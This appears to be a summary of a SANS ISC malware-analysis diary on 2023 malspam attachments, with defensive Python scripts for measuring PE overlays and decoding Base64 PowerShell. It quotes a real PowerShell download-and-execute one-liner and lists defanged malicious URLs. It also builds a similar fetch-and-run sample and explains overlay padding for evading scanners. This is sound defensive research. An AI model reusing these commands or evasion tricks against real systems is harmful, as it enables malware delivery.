Interesting large and small malspam attachments from 2023

Over 2023, 1,152 potentially malicious attachments were captured, yielding 525 unique samples (285 PE files plus a mix of scripts, Office documents, PDFs and others). The collection ranged from a 1.32 KB VBE (encoded VBScript) downloader to a ~350 MB .NET EXE padded with a very large low-entropy overlay, showing that malspam first-stage loaders arrive at both size extremes. #AgentTesla #PureCry #VBScript #VBE #PowerShell

Keypoints

  • 1,152 potentially malicious attachments were caught, narrowed to 525 unique samples (285 PE files; others include scripts, Office files, PDFs, etc.).
  • The smallest malicious file was a 1.32 KB VBE file named μεταβίβαση.vbe (Greek for "transfer"; SHA-1 3fc13ec425b0255c737b3b88005e5cb5f9366c52).
  • The VBScript, though obfuscated, turned out to be a readable downloader; decoding revealed its function. “The VBScript – although it was still obfuscated – turned out to be quite readable…”
  • The decoded content downloads a malicious BAT file from a remote URL with a PowerShell command and then runs it: "Invoke-WebRequest -Uri ('http://purecry[.]ydns[.]eu/pure/Xxqyinqnbat') -OutFile '$env:TEMP\Xxqyinqn.bat'; & '$env:TEMP\Xxqyinqn.bat'"
  • The largest sample was a ~350 MB (358,508 kB) .NET executable, SHA-1 6eefbfd8b2c547fc959fcee4c38105cb997dd00d, most of which is a very large, low-entropy overlay appended after the last PE section.
  • Such overlays inflate the file size while keeping its overall entropy low: the oversized file can exceed the size limits of some anti-malware scanners and so escape inspection, and the non-random padding avoids making the file look packed or encrypted. Without the overlay the EXE would be ~108 kB.
  • Both extremes illustrate loaders as the first stage in malware infection chains, commonly delivered by malspam.
  • The study highlights the breadth of 2023 malspam and the ongoing risk into 2024.
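
The overlay observation above (a ~350 MB file whose PE image is only ~108 kB) comes down to one measurement: where the last section's raw data ends versus where the file ends, and how random the bytes in between are. The script below is an added example, not code from the ISC diary; it parses the PE headers with struct alone, and the PE image it builds for the demo is constructed (not a runnable executable). The thresholds in looks_padded() are assumptions for this example.

```python
"""Measure a PE file's overlay: the bytes appended after the last section.

Added example, not code from the ISC diary. It parses the PE headers with
struct alone (no pefile dependency) and reports how much of the file is
overlay and how random that overlay is, which is the check behind the
diary's "~350 MB file that would be ~108 kB without the overlay" remark.
The PE image built by build_sample_pe() is constructed for the demo and is
not a runnable executable.
"""
import math
import struct
import sys
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty/constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def overlay_offset(pe: bytes) -> int:
    """File offset where the overlay starts: the end of the highest section's raw
    data (or the end of the section table if the image has no sections)."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    sect_table = coff + 20 + size_opt        # first IMAGE_SECTION_HEADER
    end = sect_table + 40 * num_sections
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at +16 and +20 of each 40-byte entry
        size_raw, ptr_raw = struct.unpack_from("<II", pe, sect_table + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    return min(end, len(pe))                 # a truncated file has no overlay


def analyse_pe(pe: bytes) -> dict:
    start = overlay_offset(pe)
    overlay = pe[start:]
    return {
        "file_size": len(pe),
        "image_size": start,                 # what the EXE would weigh without the overlay
        "overlay_size": len(overlay),
        "overlay_ratio": round(len(overlay) / len(pe), 3),
        "overlay_entropy": round(shannon_entropy(overlay), 3),
    }


def looks_padded(report: dict, min_ratio: float = 0.5, max_entropy: float = 1.0) -> bool:
    """Heuristic: most of the file is overlay and that overlay is near-constant.
    Thresholds are assumptions for this example, not values from the diary."""
    return report["overlay_ratio"] >= min_ratio and report["overlay_entropy"] <= max_entropy


def build_sample_pe(overlay: bytes) -> bytes:
    """Constructed PE32 image with one 1 KiB .text section at file offset 0x200,
    followed by `overlay`. Only the fields the parser reads are meaningful."""
    e_lfanew, size_opt, ptr_raw = 0x40, 0xE0, 0x200
    section_data = bytes(range(256)) * 4
    headers = bytearray(ptr_raw)
    headers[:2] = b"MZ"
    struct.pack_into("<I", headers, 0x3C, e_lfanew)
    headers[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    # Machine=i386, 1 section, no symbols, SizeOfOptionalHeader, Characteristics
    struct.pack_into("<HHIIIHH", headers, e_lfanew + 4, 0x14C, 1, 0, 0, 0, size_opt, 0x0102)
    struct.pack_into("<H", headers, e_lfanew + 24, 0x10B)   # PE32 optional-header magic
    sect_table = e_lfanew + 24 + size_opt
    struct.pack_into("<8sIIIIIIHHI", headers, sect_table, b".text\0\0\0",
                     len(section_data), 0x1000, len(section_data), ptr_raw,
                     0, 0, 0, 0, 0x60000020)
    return bytes(headers) + section_data + overlay


if __name__ == "__main__":
    # Analyse a real file if a path is given, else the constructed sample with 4 KiB of zero padding.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(b"\0" * 4096)
    report = analyse_pe(data)
    print(report, "padded-looking" if looks_padded(report) else "no large low-entropy overlay")
```

Run it against a suspicious EXE (`python overlay.py sample.exe`); an image_size in the tens or hundreds of kB next to a file_size in the hundreds of MB, with overlay_entropy near 0, is the pattern the diary describes. The entropy step reads the whole overlay, so on a 350 MB file expect a few seconds.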

MITRE Techniques

  • [T1059.001] PowerShell – VBScript decodes and executes a Base64-encoded PowerShell command to download a BAT file. ‘the VBScript tries to execute a Base64-encoded PowerShell command.’
  • [T1059.005] Visual Basic – The VBE/VBScript is used as a downloader; ‘The VBScript – although it was still obfuscated – turned out to be quite readable…’
  • [T1105] Ingress Tool Transfer – The VBScript downloader fetches a BAT payload from a remote URL ('downloader for a malicious BAT file'), and the chain goes on to retrieve http://justnormalsite[.]ddns[.]net/SystemEnv/uploads/nodeffender_Nrtsynmz.png, which the IOC list identifies as the final payload served with a .png extension.
  • [T1027] Obfuscated/Compressed Files and Information – The sample is obfuscated, yet its function is a downloader. ‘Although it is obfuscated, its function is quite understandable…’
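
The T1059.001 step above (a Base64-encoded PowerShell command decoded and executed by the VBScript) is the point in the chain where an analyst wants the plaintext and the URLs it reaches for. The script below is an added example, not code from the ISC diary: it decodes the Base64 (sniffing UTF-16LE, which -EncodedCommand expects, versus plain UTF-8, which self-built droppers sometimes use), extracts the URLs and defangs them for a report. The sample one-liner is constructed (example.net host, made-up file name) in the shape of the Invoke-WebRequest command the diary quotes; it is not the diary's own string.

```python
"""Decode a Base64-encoded PowerShell command and list the URLs it fetches.

Added example, not code from the ISC diary. PowerShell's -EncodedCommand takes
Base64 of UTF-16LE text, but droppers that assemble the string themselves
sometimes Base64 plain UTF-8, so the decoder sniffs which one it has. The
sample one-liner below is constructed for the demo (example.net host, made-up
file name) in the shape of the Invoke-WebRequest command the diary quotes; it
is not the diary's own string.
"""
import base64
import re

URL_RE = re.compile(r"""https?://[^\s'"()<>;]+""", re.IGNORECASE)


def encode_command(script: str, encoding: str = "utf-16-le") -> str:
    """Produce the Base64 form a dropper would embed (UTF-16LE unless told otherwise)."""
    return base64.b64encode(script.encode(encoding)).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    raw = base64.b64decode("".join(b64.split()))      # tolerate line-wrapped input
    odd_bytes = raw[1::2]
    # ASCII text in UTF-16LE has a NUL in (nearly) every odd byte position.
    if odd_bytes and odd_bytes.count(0) > len(odd_bytes) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_urls(script: str) -> list[str]:
    """Unique URLs in first-seen order (quotes and parentheses are not part of a URL)."""
    return list(dict.fromkeys(URL_RE.findall(script)))


def defang(url: str) -> str:
    """hxxp:// plus bracketed dots in the host, so the IOC cannot be clicked or auto-linked."""
    scheme, _, rest = url.partition("://")
    host, sep, path = rest.partition("/")
    return f"{scheme.lower().replace('http', 'hxxp')}://{host.replace('.', '[.]')}{sep}{path}"


def triage(b64: str) -> dict:
    """Plaintext script plus the defanged download URLs it contains."""
    script = decode_encoded_command(b64)
    return {"script": script, "urls": [defang(u) for u in extract_urls(script)]}


# Constructed sample: a downloader one-liner in the diary's shape, not its actual string.
SAMPLE_COMMAND = (
    "Invoke-WebRequest -Uri ('http://stage.example.net/pure/stage2.bat') "
    '-OutFile "$env:TEMP\\stage2.bat"; & "$env:TEMP\\stage2.bat"'
)
SAMPLE_B64 = encode_command(SAMPLE_COMMAND)

if __name__ == "__main__":
    result = triage(SAMPLE_B64)
    print(result["script"])
    for u in result["urls"]:
        print("  fetches:", u)
```

Feed the Base64 blob lifted from the VBScript into triage(); the defanged URLs go straight into the IOC list, and the plaintext shows whether the command merely drops a file or also launches it (the trailing `& "..."` in the sample).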

Indicators of Compromise

  • [SHA-1] 3fc13ec425b0255c737b3b88005e5cb5f9366c52 – Smallest malicious file, the VBE downloader μεταβίβαση.vbe (Greek for "transfer")
  • [SHA-1] 6eefbfd8b2c547fc959fcee4c38105cb997dd00d – ~350 MB .NET EXE payload
  • [Filename] μεταβίβαση.vbe – Smallest malicious file (Greek for "transfer")
  • [URL] http://purecry[.]ydns[.]eu/pure/Xxqyinqnbat – VBScript downloader target
  • [Domain] purecry[.]ydns[.]eu – Host of the first-stage BAT download (dynamic DNS domain)
  • [Domain] justnormalsite[.]ddns[.]net – Host of the final payload (dynamic DNS domain)
  • [Filename] nodeffender_Nrtsynmz.png – Final payload, served with a .png extension
  • [URL] http://justnormalsite[.]ddns[.]net/SystemEnv/uploads/nodeffender_Nrtsynmz.png – URL hosting the final payload

Read more: https://isc.sans.edu/diary/rss/30524